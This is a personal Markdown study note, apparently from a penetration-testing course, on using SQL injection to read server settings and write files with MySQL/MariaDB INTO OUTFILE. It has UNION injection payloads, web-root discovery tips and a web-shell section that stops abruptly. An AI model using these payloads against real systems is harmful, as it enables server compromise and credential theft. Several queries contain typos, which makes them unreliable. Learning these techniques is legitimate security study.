ShibuShivansh40/Cybersecurity_Notes_Obsidian_Kali/SQL Injection.md

 ## Writing Files
 The [secure_file_priv](https://mariadb.com/kb/en/server-system-variables/#secure_file_priv) variable is used to determine where to read/write files from.
 An empty value lets us read files from the entire file system.
 Otherwise, if a certain directory is set, we can only read from the folder specified by the variable.
 On the other hand, `NULL` means we cannot read/write from any directory.
 MariaDB has this variable set to empty by default, which lets us read/write to any file if the user has the `FILE` privilege.
 However, `MySQL` uses `/var/lib/mysql-files` as the default folder.
 This means that reading files through a `MySQL` injection isn't possible with default settings.
 Even worse, some modern configurations default to `NULL`, meaning that we cannot read/write files anywhere within the system.

+Query to check the variable : `SHOW VARIABLES LIKE 'secure_file_priv';` Now, we need to check the table of information_schema to know about the variable value.
+The query for that would be : `SELECT variable_name, variable+value FROM information_schema.gloabal_variables WHERE variable_name="secure_fle_priv";`
+Now the payload for this becomes : `value' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -`

+## Select INTO OUTFILE
+`SELECT * FROM users INTO OUTFILE '/tmp/credentials';` : Saves the output of the users table into the /tmp/credentials.

+>**Note:** To write a web shell, we must know the base web directory for the web server (i.e. web root).
+One way to find it is to use `load_file` to read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config`, or we can search online for other possible configuration locations.
+Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using [this wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or [this wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt).
+Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.

+So the payload to write the file becomes : `value' UNION SELECT 1, 'file written successfully!', 3, 4 INT O OUTFILE '/var/www/html/proof.txt'-- -`

+## Writing a Web Shell
+`value' UNION SELECT "", `